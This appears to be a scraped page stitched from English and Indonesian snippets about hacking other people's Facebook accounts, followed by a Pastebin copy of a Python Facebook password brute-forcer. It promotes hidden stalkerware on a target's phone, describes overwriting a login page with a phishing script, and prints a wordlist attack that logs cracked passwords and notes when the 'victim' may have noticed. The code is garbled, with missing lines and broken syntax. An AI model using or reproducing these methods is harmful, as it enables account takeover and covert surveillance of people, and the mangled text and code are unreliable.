- Part 2: How to Hack Someone’s Facebook ID and Password. Spyic is a popular Facebook hack software. It is completely invisible and non-traceable. As such, you can hack someone’s Facebook ID without them growing suspicious at all. However, you have to be careful that after you install Spyic into the target phone, you should delete the Spyic icon.
- Cara Hack Facebook Orang Lain dengan Program CMD Software Windows 7 8 10 – Media sosial facebook (fb) memang menjadi tongkrongan maya yang banyak digandrungi netizen sehingga tak heran bila cara hack facebook orang lain menggunakan cmd software windows 7, 8, 10 menjadi bagian trik dari peretasan untuk berbagai kepenti.
- Menimpa Script HTML Halaman Login Resmi Facebokk dengan Script Hack FB Setelah anda selesai mendownload script hack FB pada langkah kedua tadi, selanjutnya copy lalu timpa file HTML halaman login resmi FB yang anda dapatkan pada langkah 1 tadi.
Jul 6th, 2015
Kode Script Hack Fb
Never
Hacker Script Hack Fb
Oct 08, 2020 Metode hack fb dengan script ini, masih work sebagai cara hack facebook dengan inspect element dan html cmd 2016, 2017, 2018. Namun sayangnya, script untuk hack fb ini tidak work di 2019. Mungkin karena facebook hackerapp ini sudah diketahui oleh facebook.
Not a member of Pastebin yet?Sign Up, it unlocks many cool features!

Script Hack Fb Termux
- #!/usr/bin/python
- # This was written for educational purpose and pentest only. Use it at your own risk.
- # Author will not be responsible for any damage !!
- # Version : 1.0
- # https://www.facebook.com/groups/anonymousddosers/
- importre
- importsys
- importwarnings
- try:
- exceptImportError:
- print'[*] Please install mechanize python module first'
- exceptKeyboardInterrupt:
- sys.exit(1)
- importcookielib
- print'[*] Please install cookielib python module first'
- exceptKeyboardInterrupt:
- sys.exit(1)
- warnings.filterwarnings(action='ignore', message='.*gzip transfer encoding is experimental!', category=UserWarning)
- # define variable
- __programmer__ ='mmmuhahaha_ <hehe.haha@gmail.com>'
- verbose =False
- usepassproxy =False
- file=open(log,'a')
- checkpoint ='checkpoint'
- fblogin ='https://login.facebook.com/login.php?login_attempt=1'
- useragent =['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
- 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
- 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
- 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
- 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
- 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
- 'Opera/8.00 (Windows NT 5.1; U; en)',
- 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
- 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
- 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
- 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
- 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
- facebook =''
- / _| | | | |
- | _/ _` |/ __/ _ '_ / _ / _ | |/ /
- |_| __,_|______|_.__/ ___/ ___/|_|_
- Version : %s'' % (__programmer__, __version__)
- Usage : %s [options]
- Option : -w, --wordlist <filename> | Wordlist used for bruteforcing
- -p, --proxy <host:port> | Set http proxy will be use
- -k, --usernameproxy <username> | Set username at proxy will be use
- -i, --passproxy <password> | Set password at proxy will be use
- -l, --log <filename> | Specify output filename (default : fbbruteforcer.log)
- '' % (sys.argv[0],sys.argv[0],sys.argv[0])
- Usage : %s [option]
- '' % sys.argv[0]
- def helpme():
- print option
- file.write(option)
- print facebook
- file.write(facebook)
- sys.exit(1)
- for arg insys.argv:
- if arg.lower()'-u'or arg.lower()'--user':
- username =sys.argv[int(sys.argv[1:].index(arg))+2]
- elif arg.lower()'-w'or arg.lower()'--wordlist':
- wordlist =sys.argv[int(sys.argv[1:].index(arg))+2]
- log =sys.argv[int(sys.argv[1:].index(arg))+2]
- useproxy =True
- elif arg.lower()'-k'or arg.lower()'--userproxy':
- usw =sys.argv[int(sys.argv[1:].index(arg))+2]
- elif arg.lower()'-i'or arg.lower()'--passproxy':
- usp =sys.argv[int(sys.argv[1:].index(arg))+2]
- elif arg.lower()'-v'or arg.lower()'--verbose':
- elif arg.lower()'-h'or arg.lower()'--help':
- eliflen(sys.argv)<=1:
- exceptIOError:
- exceptNameError:
- exceptIndexError:
- try:
- userEmail = word[0:pos]
- print('password: ' + word )
- file.write('[*] Trying ' + userEmail + '::' + word + 'n')
- rch =random.choice(useragent)
- # print('User Agent: ' + rch )
- # for form in br.forms():
- # print form
- # To show all control elements in the form
- # for control in br.form.controls:
- # print 'type=%s, name=%s value=%s' % (control.type, control.name, br[control.name])
- # To dump cookies data being sent and received
- # If email still auto-filled on login form, this script would not work as expected, so we need to release it
- NotMe ='notme_cuid'
- if(NotMe in link.url):
- response = br.follow_link(link)
- br.form['email']= userEmail
- br.submit()
- print response
- print'nn[*] Logging in success...'
- print'[*] Password : %sn' % (word)
- file.write('n[*] userEmail : %s' % (userEmail))
- # After successful login, force to Log Out (to clear the cookies & session - important!)
- if form.attrs['id']'logout_form':
- br.submit()
- print'nn[*] Logging in success...but stuck on checkpoint! Victim maybey has been noticed'
- print'[*] Password : %sn' % (word)
- file.write('n[*] Logging in success...but stuck on checkpoint! Victim maybey has been noticed')
- file.write('n[*] Password : %snn' % (word))
- # In checkpoint, this account may has been logged in, so we need to Log it Out after successful login
- for link in br.links():
- request = br.click_link(link)
- # print response.geturl()
- # else:
- print'n[*] Exiting program...n'
- except mechanize._mechanize.FormNotFoundError:
- file.write('n[*] Form Not Foundn')
- except mechanize._form.ControlNotFoundError:
- file.write('n[*] Control Not Foundn')
- # def dump():
- # print cookie.name, cookie.value
- def releaser():
- for word in words:
- global br
- # Uncomment this variable if you want to enable dump()
- try:
- cj =cookielib.LWPCookieJar()
- br.set_handle_equiv(True)
- br.set_handle_redirect(True)
- br.set_handle_robots(False)
- br.set_debug_redirects(False)
- br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
- br.set_proxies({'http': proxy})
- br.add_proxy_password(usw, usp)
- br.set_debug_http(True)
- br.set_debug_redirects(True)
- print'n[*] Exiting program...n'
- sys.exit(1)
- preventstrokes =open(wordlist,'r')
- count =0
- words[count]= words[count].strip()
- exceptIOError:
- file.write('n[*] Error: Check your wordlist pathn')
- exceptNameError:
- exceptKeyboardInterrupt:
- file.write('n[*] Exiting program...n')
- try:
- print'n[*] Starting attack at %s' % time.strftime('%X')
- #print '[*] Account for bruteforcing %s' % (username)
- print'[*] Bruteforcing, please wait...'
- file.write('n[*] Starting attack at %s' % time.strftime('%X'))
- #file.write('n[*] Account for bruteforcing %s' % (username))
- file.write('n[*] Loaded : %d words' % int(len(words)))
- file.write('n[*] Bruteforcing, please wait...n')
- print'n[*] Exiting program...n'
- try:
- bruteforce(word)
- helpme()
- if __name__ '__main__':
